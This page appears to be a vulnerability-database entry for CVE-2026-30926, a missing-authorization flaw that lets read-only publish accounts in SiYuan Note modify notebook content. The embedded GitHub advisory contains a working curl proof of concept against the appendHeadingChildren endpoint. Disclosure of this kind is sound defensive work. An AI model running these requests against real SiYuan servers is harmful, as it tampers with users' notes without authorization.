Vulnerability-Lookup

CVE-2026-30926 (GCVE-0-2026-30926)

Vulnerability from cvelistv5 – Published: 2026-03-09 21:07 – Updated: 2026-03-10 14:58

Title

SiYuan Note publish service authorization bypass allows low-privilege users to modify notebook content

Summary

SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.

Severity ?

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

CWE

CWE-284 - Improper Access Control
CWE-862 - Missing Authorization

Assigner

GitHub_M

References

URL

Tags

https://github.com/siyuan-note/siyuan/security/ad…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	siyuan-note	siyuan	Affected: < 3.5.10

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-30926",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-10T14:58:48.132153Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-10T14:58:53.053Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "siyuan",
          "vendor": "siyuan-note",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.5.10"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-09T21:07:07.481Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
        }
      ],
      "source": {
        "advisory": "GHSA-f9cq-v43p-v523",
        "discovery": "UNKNOWN"
      },
      "title": "SiYuan Note publish service authorization bypass allows low-privilege users to modify notebook content"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-30926",
    "datePublished": "2026-03-09T21:07:07.481Z",
    "dateReserved": "2026-03-07T16:40:05.884Z",
    "dateUpdated": "2026-03-10T14:58:53.053Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-30926\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T07:44:56.943\",\"lastModified\":\"2026-03-13T17:06:54.933\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.\"},{\"lang\":\"es\",\"value\":\"SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Anteriormente a la 3.5.10, existe una vulnerabilidad de escalada de privilegios en el servicio de publicaci\u00f3n de SiYuan Note que permite a las cuentas de publicaci\u00f3n de bajo privilegio (RoleReader) modificar el contenido del cuaderno a trav\u00e9s del endpoint de la API /api/block/appendHeadingChildren. El endpoint requiere solo el rol model.CheckAuth, que acepta sesiones de RoleReader, pero no aplica comprobaciones m\u00e1s estrictas, como CheckAdminRole o CheckReadonly. Esto permite a los usuarios de publicaci\u00f3n remotos autenticados con privilegios de solo lectura a\u00f1adir nuevos bloques a documentos existentes, comprometiendo la integridad de las notas almacenadas.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"},{\"lang\":\"en\",\"value\":\"CWE-862\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-862\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"3.5.10\",\"matchCriteriaId\":\"0E7B145F-4786-4534-B4D6-A947F4CD06FE\"}]}]}],\"references\":[{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30926\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-10T14:58:48.132153Z\"}}}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-10T14:58:42.515Z\"}}], \"cna\": {\"title\": \"SiYuan Note publish service authorization bypass allows low-privilege users to modify notebook content\", \"source\": {\"advisory\": \"GHSA-f9cq-v43p-v523\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"siyuan-note\", \"product\": \"siyuan\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.5.10\"}]}], \"references\": [{\"url\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523\", \"name\": \"https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-862\", \"description\": \"CWE-862: Missing Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-09T21:07:07.481Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-30926\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-10T14:58:53.053Z\", \"dateReserved\": \"2026-03-07T16:40:05.884Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-09T21:07:07.481Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-F9CQ-V43P-V523

Vulnerability from github – Published: 2026-03-09 18:18 – Updated: 2026-03-10 18:39

Summary

SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren

Details

Summary

A privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint.

The endpoint only requires model.CheckAuth, which accepts RoleReader sessions. Because the endpoint performs a persistent document mutation and does not enforce CheckAdminRole or CheckReadonly, a publish user with read-only privileges can append new blocks to existing documents.

This allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.

Details

File: router.go, block.go, block.go, session.go Lines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209 Vulnerable Code:

- router.go: ginServer.Handle("POST", "/api/block/appendHeadingChildren", model.CheckAuth, appendHeadingChildren)
- api/block.go: model.AppendHeadingChildren(id, childrenDOM)
- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)
- session.go: CheckAuth accepts RoleReader as authenticated

Why Vulnerable: A low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.

PoC

Enable publish service and create low-privilege account

curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
  "enable": true,
  "port": 6808,
  "auth": {
    "enable": true,
    "accounts": [
      {
        "username": "viewer",
        "password": "viewerpass"
      }
    ]
  }
}' \
http://127.0.0.1:6806/api/setting/setPublish

Create a test notebook and document (admin)

curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{"name":"AuditPOC"}' \
http://127.0.0.1:6806/api/notebook/createNotebook

Create a document containing a heading:

curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
  "notebook":"<NOTEBOOK_ID>",
  "path":"/Victim",
  "markdown":"# VictimHeading\n\nOriginal paragraph"
}' \
http://127.0.0.1:6806/api/filetree/createDocWithMd

Retrieve heading block ID (low-priv publish account)

curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT id,root_id FROM blocks WHERE content='\''VictimHeading'\'' LIMIT 1"}' \
http://127.0.0.1:6808/api/query/sql

Example response:

{
 "id":"20260307093334-05sj7bz",
 "root_id":"20260307093334-vsa6ft0"
}

Generate block DOM

curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"dom":"<p>InjectedByReader</p>"}' \
http://127.0.0.1:6808/api/lute/html2BlockDOM

Append block using the vulnerable endpoint

curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{
"id":"20260307093334-05sj7bz",
"childrenDOM":"<div ...>InjectedByReader</div>"
}' \
http://127.0.0.1:6808/api/block/appendHeadingChildren

Server response:

{"code":0}

Verify unauthorized modification

curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT content FROM blocks WHERE root_id='\''20260307093334-vsa6ft0'\'' ORDER BY sort"}' \
http://127.0.0.1:6808/api/query/sql

Result includes attacker-controlled content:

InjectedByReader

This confirms that the low-privilege publish user successfully modified the document.

Impact

This vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.

Potential impacts include:

• Unauthorized modification of private notes • Content tampering in published notebooks • Loss of data integrity • Possible chaining with other API endpoints to escalate further privileges

The issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.

Severity ?

7.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.0-20260304035530-d03ebdec8279"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30926"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-09T18:18:39Z",
    "nvd_published_at": "2026-03-10T07:44:56Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the `/api/block/appendHeadingChildren` API endpoint.\n\nThe endpoint only requires `model.CheckAuth`, which accepts `RoleReader` sessions. Because the endpoint performs a persistent document mutation and does not enforce `CheckAdminRole` or `CheckReadonly`, a publish user with read-only privileges can append new blocks to existing documents.\n\nThis allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.\n\n### Details\n\nFile: router.go, block.go, block.go, session.go\nLines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209\nVulnerable Code:\n```\n- router.go: ginServer.Handle(\"POST\", \"/api/block/appendHeadingChildren\", model.CheckAuth, appendHeadingChildren)\n- api/block.go: model.AppendHeadingChildren(id, childrenDOM)\n- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)\n- session.go: CheckAuth accepts RoleReader as authenticated\n```\nWhy Vulnerable:\nA low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.\n\n\n\n### PoC\n\n1. Enable publish service and create low-privilege account\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n  \"enable\": true,\n  \"port\": 6808,\n  \"auth\": {\n    \"enable\": true,\n    \"accounts\": [\n      {\n        \"username\": \"viewer\",\n        \"password\": \"viewerpass\"\n      }\n    ]\n  }\n}\u0027 \\\nhttp://127.0.0.1:6806/api/setting/setPublish\n```\n2. Create a test notebook and document (admin)\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"name\":\"AuditPOC\"}\u0027 \\\nhttp://127.0.0.1:6806/api/notebook/createNotebook\n```\nCreate a document containing a heading:\n```\ncurl -u workspace:\u003cACCESS_AUTH_CODE\u003e \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n  \"notebook\":\"\u003cNOTEBOOK_ID\u003e\",\n  \"path\":\"/Victim\",\n  \"markdown\":\"# VictimHeading\\n\\nOriginal paragraph\"\n}\u0027 \\\nhttp://127.0.0.1:6806/api/filetree/createDocWithMd\n```\n3. Retrieve heading block ID (low-priv publish account)\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"stmt\":\"SELECT id,root_id FROM blocks WHERE content=\u0027\\\u0027\u0027VictimHeading\u0027\\\u0027\u0027 LIMIT 1\"}\u0027 \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nExample response:\n```\n{\n \"id\":\"20260307093334-05sj7bz\",\n \"root_id\":\"20260307093334-vsa6ft0\"\n}\n```\n4. Generate block DOM\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"dom\":\"\u003cp\u003eInjectedByReader\u003c/p\u003e\"}\u0027 \\\nhttp://127.0.0.1:6808/api/lute/html2BlockDOM\n```\n\n5. Append block using the vulnerable endpoint\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\n\"id\":\"20260307093334-05sj7bz\",\n\"childrenDOM\":\"\u003cdiv ...\u003eInjectedByReader\u003c/div\u003e\"\n}\u0027 \\\nhttp://127.0.0.1:6808/api/block/appendHeadingChildren\n```\nServer response:\n```\n{\"code\":0}\n```\n\n6. Verify unauthorized modification\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d \u0027{\"stmt\":\"SELECT content FROM blocks WHERE root_id=\u0027\\\u0027\u002720260307093334-vsa6ft0\u0027\\\u0027\u0027 ORDER BY sort\"}\u0027 \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nResult includes attacker-controlled content:\n```\nInjectedByReader\n```\nThis confirms that the low-privilege publish user successfully modified the document.\n\n### Impact\nThis vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.\n\nPotential impacts include:\n\n\u2022 Unauthorized modification of private notes\n\u2022 Content tampering in published notebooks\n\u2022 Loss of data integrity\n\u2022 Possible chaining with other API endpoints to escalate further privileges\n\nThe issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.",
  "id": "GHSA-f9cq-v43p-v523",
  "modified": "2026-03-10T18:39:39Z",
  "published": "2026-03-09T18:18:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30926"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren"
}

FKIE_CVE-2026-30926

Vulnerability from fkie_nvd - Published: 2026-03-10 07:44 - Updated: 2026-03-13 17:06

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	b3log	siyuan	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "0E7B145F-4786-4534-B4D6-A947F4CD06FE",
              "versionEndExcluding": "3.5.10",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes."
    },
    {
      "lang": "es",
      "value": "SiYuan es un sistema de gesti\u00f3n de conocimiento personal. Anteriormente a la 3.5.10, existe una vulnerabilidad de escalada de privilegios en el servicio de publicaci\u00f3n de SiYuan Note que permite a las cuentas de publicaci\u00f3n de bajo privilegio (RoleReader) modificar el contenido del cuaderno a trav\u00e9s del endpoint de la API /api/block/appendHeadingChildren. El endpoint requiere solo el rol model.CheckAuth, que acepta sesiones de RoleReader, pero no aplica comprobaciones m\u00e1s estrictas, como CheckAdminRole o CheckReadonly. Esto permite a los usuarios de publicaci\u00f3n remotos autenticados con privilegios de solo lectura a\u00f1adir nuevos bloques a documentos existentes, comprometiendo la integridad de las notas almacenadas."
    }
  ],
  "id": "CVE-2026-30926",
  "lastModified": "2026-03-13T17:06:54.933",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "LOW",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-10T07:44:56.943",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        },
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-30926 (GCVE-0-2026-30926)

GHSA-F9CQ-V43P-V523

Summary

Details

PoC

Impact

FKIE_CVE-2026-30926

Tags

Sightings

Nomenclature